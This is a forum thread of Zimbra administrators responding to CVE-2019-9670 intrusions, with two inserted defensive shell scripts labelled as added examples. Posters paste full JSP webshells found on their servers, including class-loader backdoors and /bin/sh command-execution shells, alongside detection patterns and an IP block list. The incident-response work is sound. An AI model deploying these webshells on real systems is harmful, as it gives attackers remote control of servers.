CVE-2019-9670 being actively exploited (Hacked Server)

Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Post by Drake »

Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

<</opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

Thank you.

With Regards
elby
Posts: 16
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by elby »

The problem appeared again. Do you have these folders?


/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp

with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java

and

/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java

@Drake, yes, the files you mentioned are infected.
docat
Posts: 2
Joined: Wed May 29, 2019 9:01 am

Re: CVE-2019-9670 being actively exploited

Post by docat »

I noticed that two days in a row at 9:18 (my local time) sed is started. It works about 10-20 seconds and after that zmswath appears and all of this.
Can this be used somehow?
erefer@gmail.com
Posts: 3
Joined: Tue May 28, 2019 12:41 pm

Re: CVE-2019-9670 being actively exploited

Post by erefer@gmail.com »

Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards
Yes, it's malicious code. And your version confirms that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
elby
Posts: 16
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by elby »

Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Post by Drake »

erefer@gmail.com wrote:
Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards
Yes, it's malicious code. And your version confirms that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
erefer, thanks for the reply. Regarding the key used by the hacker, do I need to do something else than just deleting these two files?

Thank you in advance
With Regards
zimbraxtc
Posts: 10
Joined: Mon May 27, 2019 6:13 pm

Re: CVE-2019-9670 being actively exploited

Post by zimbraxtc »

elby wrote:Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
I have not.

/opt/zimbra/mailboxd/work/zimbraAdmin/ exists but is empty.

Running 8.6
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Post by mqaroush »

Can you check the following code found in the corresponding files and tell if it is malicious.
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>

Also, what is the meaning of this line:
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
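Added example, not from any poster in this thread: a small POSIX shell function that answers the question above by pulling every POST to /Autodiscover/Autodiscover.xml out of a mailboxd access_log and counting them per client address and user agent. That path is the Autodiscover servlet whose XXE is CVE-2019-9670 (the tint0 write-up linked at the end of this thread describes it), and "python-requests/2.21.0" is the default User-Agent of the Python requests library, so the quoted line is a scripted request to the vulnerable endpoint, not a mail client doing autoconfiguration. The sample log the script writes is constructed: its first line is the entry quoted above, the other addresses are documentation-range placeholders.

```shell
#!/bin/sh
# Added example (not from the thread). Pull every POST to the Autodiscover
# endpoint out of mailboxd access_log files and count them per client and user agent.

# flag_autodiscover_posts LOGFILE...
# Prints "<count> <client-ip> <user-agent>", busiest client first.
# Fields are taken by splitting on double quotes: $2 is the request line,
# $6 the user agent, and the client IP is the first word of $1.
# The path check is case-insensitive because scanners vary the casing.
flag_autodiscover_posts() {
    awk -F'"' '
        {
            split($1, who, " ")
            split($2, req, " ")
            if (req[1] == "POST" && tolower(req[2]) ~ /^\/autodiscover\/autodiscover\.xml/) {
                n[who[1] " " $6]++
            }
        }
        END { for (k in n) print n[k], k }
    ' "$@" | sort -rn
}

# write_constructed_sample_log
# Writes a five-line sample to a temp file and echoes its path. Line 1 is the
# entry quoted in the post above; the remaining lines are constructed, using
# documentation-range addresses (203.0.113.0/24, 198.51.100.0/24).
write_constructed_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
203.0.113.7 - - [30/May/2019:00:20:01 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 4
203.0.113.7 - - [30/May/2019:00:20:03 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 4
198.51.100.23 - - [30/May/2019:00:21:10 +0000] "GET /zimbra/ HTTP/1.1" 200 6123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0" 12
198.51.100.23 - - [30/May/2019:00:21:15 +0000] "POST /service/soap/AuthRequest HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0" 30
EOF
    echo "$f"
}

# Stand-alone demo on the constructed sample. On a server, point it at the
# file from the post instead:
#   flag_autodiscover_posts /opt/zimbra/log/access_log.2019-05-30
log=$(write_constructed_sample_log)
flag_autodiscover_posts "$log"
rm -f "$log"
```

The status column is ignored on purpose: whether the server answered 400 or 200, a non-browser client posting to this path is the kind of traffic worth cross-checking against the webapps and work directories other posters list in this thread, and the per-client counts separate a one-off scan from a sustained attempt.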
bizonek
Posts: 7
Joined: Sat Sep 13, 2014 2:36 am

Re: CVE-2019-9670 being actively exploited

Post by bizonek »

Hi

Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
grep "if.*equals(" -R /opt/zimbra/mailboxd/
and remove code starting from %if ("HASSSSHHHHH to ; } %
example:
<%
if ( "N67nqYcLWDOojFzFNvPCSAPQKg7VysUYXclEM1BZBIQ" .equals(
.....
QokFueMBi ) ) ;
} out.print(
"</p"
+ "re>"
) ; } %>
If the file is binary, remove a whole file.

#2 - block all those IPs:
  • 141.98.80.47
  • 71.6.146.130
  • 158.69.195.70
  • 85.234.126.0/24
  • 185.211.245.0/24
  • 89.248.0.0/16
  • 46.3.96.2
#3 - Apply patch one more time (with an argument -force)

#4 - reboot the system (required to stop all connections or kill all active connections)

After this, I have almost a week without any problems.
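Added example, not bizonek's own commands: a report-only scan for step #1 that walks the webapps and compiled-JSP work directories named in this thread and lists files showing the three traits the quoted shells share (a hard-coded token compared with request.getParameter, Runtime.getRuntime() for command execution, defineClass for loading an uploaded class). It is narrower than grep "if.*equals(", which also matches legitimate Zimbra JSPs, and it reads .class files too, since the same string constants survive compilation (the binary files bizonek mentions). The sample tree it builds for the demo is constructed and contains only marker strings, no working shell; the real paths in the comment are the ones from this thread.

```shell
#!/bin/sh
# Added example (not from the thread). Report-only scan for the webshell traits
# quoted in this thread; nothing is modified or deleted.

# Indicators assembled from the JSPs posted above (constructed regex, ERE syntax):
#   getRuntime\(\)                                    command execution (Debug_jsp / Ajax.jsp style)
#   defineClass\(                                     loading an uploaded class (XZimbra.jsp / Alert.jsp style)
#   \.equals\([[:space:]]*request\.getParameter\(     the hard-coded token gate both styles use
WEBSHELL_PATTERNS='getRuntime\(\)|defineClass\(|\.equals\([[:space:]]*request\.getParameter\('

# scan_for_webshells DIR...
# Prints "pattern-hit: <file>" for each matching .jsp/.java/.class file.
# Returns 1 when anything matched, 0 when the given directories are clean.
scan_for_webshells() {
    hits=""
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # grep -a treats compiled .class files as text; the indicator strings survive compilation.
        # GNU find passes grep's "no match" status through with -exec ... +, hence the || true.
        found=$(find "$dir" -type f \( -name '*.jsp' -o -name '*.java' -o -name '*.class' \) \
                    -exec grep -alE "$WEBSHELL_PATTERNS" {} + 2>/dev/null || true)
        if [ -n "$found" ]; then
            hits="${hits}${found}
"
        fi
    done
    if [ -n "$hits" ]; then
        printf '%s' "$hits" | sed 's/^/pattern-hit: /'
        return 1
    fi
    return 0
}

# build_constructed_sample
# Creates a throwaway tree with the layout from the thread and echoes its path.
# The two "infected" files carry only the marker strings, not a working shell.
build_constructed_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/webapps/zimbra/public" "$root/work/zimbra/org/apache/jsp/public_/jsp"
    printf '%s\n' '<% if ( "CONSTRUCTED-TOKEN" .equals( request.getParameter( "ppwd" ) ) ) { /* marker only */ } %>' \
        > "$root/webapps/zimbra/public/Ajax.jsp"
    printf '%s\n' '/* constructed marker: a ClassLoader subclass exposing defineClass( */' \
        > "$root/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java"
    printf '%s\n' '<%@ page contentType="text/html" %><html>clean page</html>' \
        > "$root/webapps/zimbra/public/Clean.jsp"
    echo "$root"
}

# Stand-alone demo on the constructed tree. On a real server pass the directories
# named in this thread instead, e.g.:
#   scan_for_webshells /opt/zimbra/jetty/webapps /opt/zimbra/mailboxd/work \
#                      /opt/zimbra/jetty-distribution-9.1.5.v20140505/work
sample=$(build_constructed_sample)
scan_for_webshells "$sample/webapps" "$sample/work" || echo "review the files above before removing anything"
rm -rf "$sample"
```

Run it before and after the re-patch and the reboot in steps #3 and #4: an empty report after the reboot is the check that the cleanup held, and a hit reappearing later is the signal elby and docat describe, that the files are being re-dropped and the entry point is still open.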
doses
Posts: 1
Joined: Sun Jun 02, 2019 9:54 am

Re: CVE-2019-9670 being actively exploited

Post by doses »

Hi everyone.

I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )